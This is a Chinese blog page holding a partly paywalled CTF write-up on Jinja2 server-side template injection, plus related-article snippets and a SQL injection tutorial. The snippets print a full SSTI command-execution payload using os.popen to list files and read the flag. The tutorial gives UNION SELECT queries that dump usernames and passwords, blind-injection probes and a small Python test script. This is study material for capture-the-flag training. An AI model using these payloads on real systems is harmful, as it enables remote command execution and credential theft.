攻防世界CTF Web_python_template_injection

深入理解CTF:Web Python 模板注入漏洞解析
最新推荐文章于 2025-09-30 22:00:00 发布
原创 最新推荐文章于 2025-09-30 22:00:00 发布 · 3.8k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #安全 #经验分享 #web

本文记录了学习模块注入的过程,特别是针对Web_python_template_injection问题。介绍了SSTI(Server-Side Template Injection)的工作原理,提到了Python中的Jinja2、Mako、Tornado和Django等框架可能存在的风险。通过os模块的探索,展示了如何利用模板注入读取服务器文件,如利用`os.popen`命令读取`ls`和`cat fl4g`,揭示了攻击者可能获取敏感信息的途径。

记录模块注入学习过程

题目:Web_python_template_injection提醒是模块注入

  • 在Jinja2模板引擎中,{ {}}是变量包裹标识符。{ {}}并不仅仅可以传递变量,还可以执行一些简单的表达式。

模块注入测试:
网址输入“{ {1*21}}”页面显示21,说面存在“SSTI”
在这里插入图片描述在其他大佬的博客中收集的相关知识:

  • SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja2
    mako tornado django,php的smarty twig,java的jade
    velocity。当这些框架对运用渲染函数生成html的时候会出现SSTI的问题。

  • os模块都是从warnings.catch_warnings模块入手的,在所有模块中查找catch_warnings的位置,为第59个
    查看catch_warnings模块都存在哪些全局函数,可以找到linecache函数,os模块就在其中

  • instance.class 可以获取当前实例的类对象

  • class.mro 获取当前类对象的所有继承类

  • 每一个新式类都保留了它所有的子类的引用,subclasses()这个方法返回了

最低0.47元/天 解锁文章
攻防世界-web Web_python_template_injection
m0_48108919的博客
02-11 3468
提示python模板注入 随便输入个/test目录查看,提示not found,并且把我们的输入test进行了输出,可以尝试在这个位置进行注入 1.判断模板引擎: 找到收藏已久的模板注入图 首先从${7*7}开始测试:并没有执行 继续测试{{7*7}}:执行成功,输出了49 因为Twig是php的模板,所有可以确定模板为Jinja2 2.直接百度搜索Jinja2模板注入漏洞 参考:https://blog.youkuaiyun.com/qq_36374896/arti...
攻防世界 web进阶区 Web_python_template_injection
m0_51395584的博客
06-17 1211
攻防世界 web进阶区 Web_python_template_injection python的flask模板漏洞利用,本人对这个模板也不是很熟悉,大家将就看吧。
攻防世界Web_python_template_injection
2302_79800344的博客
04-01 1762
【代码】【攻防世界Web_python_template_injection
攻防世界-web-Web_python_template_injection
wuh2333的博客
06-16 2835
攻防世界python模板注入
攻防世界WEB---Web_python_template_injection
Red Rapefruit
07-24 708
有关python模板注入漏洞的学习
攻防世界25-Web_python_template_injection-CTFWeb
LH1013886337的博客
10-16 917
首先,题目告诉我们这是一个 python 注入问题,思考怎样用 python 语句获取控制台权限:想到了。包裹的内容当做变量解析替换,所以当我们传入。python模板注入,其实就是ssti,举例,Jinja2 在渲染的时候会把。,这下我们就可以随便用控制台输出了。, 我们想要的是内容,所所以选择。类,它在列表的第七十二位, 即。时,表达式就会被渲染器执行。从其中可以找到我们想要 的。), 这两句前者返回。
攻防世界-Web-Web_python_template_injection
最新发布
2301_80797059的博客
09-30 159
1.SSTI模版注入。
攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection
闵行小鱼塘
10-12 1321
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是Web_python_flask_sql_injection的writeup
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1406
好难啊
攻防世界Web_python_template_injectionweb进阶)
my_name_is_sy的博客
06-29 2168
考点为模板漏洞及其利用。
攻防世界——webWeb_python_template_injection
2401_88083440的博客
05-13 746
以前对于python的模板注入了解得并不很细致,基本就是用别人的payload,希望借此一篇来丰富一下。
攻防世界】十二、Web_python_template_injection
Hi~ 土拨鼠
09-16 1165
步骤 打开所给场景,根据所给提示是python的模板注入 尝试一下漏洞是否存在:payload:/{{1+1}} 发现{{}}中的表达式被执行,构造命令执行payload:{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}} 发现flag,将上述payload中的ls改为cat fl4g即可获得目标:{{''.__class__.__mro__[2].__subcl.
攻防世界Web_python_template_injection
weixin_52268949的博客
02-08 968
Web_python_template_injection 根据题目意思有点像python的ssti模板注入 我们来测试一下 果真存在那么我们就用ssti的基本方法了 我们先来看看全局变量 我们先来寻找一下基类 http://111.200.241.244:62377/{{''.__class__.__mro__}} 在这里发现了object类 寻找<type ‘object’>类的所有子类中可用的引用类 http://111.200.241.244:62377/{{''.__cla
攻防世界 - Web - Level 2 | Web_python_template_injection
Blue17 の 小窝
12-30 870
那么下面就简单了,就是 SSTI 的流程。因为 Python 所有类的基类都是 Object(Flask 框架是 Python 的哦),所以 SSTI 实际上就是通过数据类型的父类找到 Object 类,然后再找到 Object 类衍生出来的可以执行文件读取或者命令执行的函数(有点抽象,可以去看看上面提供的参考文章,自己做个推导就好)。上面那个 Payload 定位到了 Object 类下的所有子类,那么下面我们就要去实例化这些类并且通过。既然是考察的 SSTI,我们就得首先找到可注入的点,输入。
攻防世界 Web_python_template_injection(flask模版注入)
weixin_73399382的博客
07-06 1588
通过调用__class__.__mro__,可以获取该类的方法解析顺序(Method Resolution Order,MRO),它是一个元组,按照查找方法时的顺序列出了对象所属类及其父类。解析:"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes),而不是对象(objects)。综上所述,"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes)SSTI与这个方法密不可分。
攻防世界--Web_python_template_injection
m0_67467924的博客
05-29 389
查看文件内容:''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()4.构造payload查看当前目录文件,''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()1.获取基本类:''.__class__.__mro__运行成功,证明存在模板注入。
攻防世界web进阶之Web_python_template_injection
胖虎很忙
10-11 3698
(1)简单探测 http://111.198.29.45:42611/{{7+7}} 返回 URL http://111.198.29.45:47259/14 not found 证明执行了这个命令, (2)http://111.198.29.45:47259/{{config.items()}} 查看系统配置; (3)读取passwd信息 {{ [].class.base.subc...
ctf web_sqli
06-16
### CTF Web SQL注入题目及解法 SQL注入是CTF竞赛中Web安全类题目常见的考点之一,通常涉及利用SQL语法漏洞来获取敏感信息或执行恶意操作。以下是一些典型的CTF Web SQL注入题目及其解题思路。 #### 1. 确定字段数目 在SQL注入攻击中,确定数据库查询返回的字段数目是非常重要的一步。可以通过`ORDER BY`语句测试字段数目[^3]。例如: ```sql ?id=1' order by 1 --+ ``` 如果页面正常显示,则继续增加数字直到页面报错。假设测试结果如下: - `?id=1' order by 3 --+` 页面正常。 - `?id=1' order by 4 --+` 页面报错。 由此可以推断出字段数目为3[^3]。 #### 2. 利用联合查询(UNION SELECT)提取数据 一旦确定了字段数目,可以使用`UNION SELECT`语句从其他表中提取数据。例如: ```sql ?id=-1' UNION SELECT 1,2,database() --+ ``` 上述语句将返回当前数据库名称。进一步可以提取表名和列名: ```sql ?id=-1' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database() --+ ``` 此语句会返回当前数据库中的所有表名[^2]。 #### 3. 枚举表中的列名 在获取表名后,可以继续枚举表中的列名。例如: ```sql ?id=-1' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users' --+ ``` 此语句将返回`users`表中的所有列名[^2]。 #### 4. 提取敏感数据 最后,通过联合查询提取敏感数据,如用户名和密码。例如: ```sql ?id=-1' UNION SELECT 1,concat(username,0x3a,password),3 FROM users --+ ``` 此语句将返回`users`表中的用户名和密码,并用冒号分隔[^2]。 #### 5. 时间盲注与布尔盲注 对于无法直接回显注入结果的情况,可以使用时间盲注或布尔盲注。例如: - 时间盲注:`?id=1' AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=104,SLEEP(5),0) --+` - 布尔盲注:`?id=1' AND ASCII(SUBSTRING((SELECT database()),1,1))=104 --+` 这些方法通过观察页面响应时间或状态变化来逐字符猜解数据库信息[^3]。 #### 示例代码 以下是基于Python的自动化SQL注入脚本示例: ```python import requests url = "http://example.com/login" payload = "' OR SLEEP(5)--+" data = {"username": payload, "password": "irrelevant"} response = requests.post(url, data=data) if response.elapsed.total_seconds() > 5: print("Time-based SQL injection is possible.") else: print("No vulnerability detected.") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值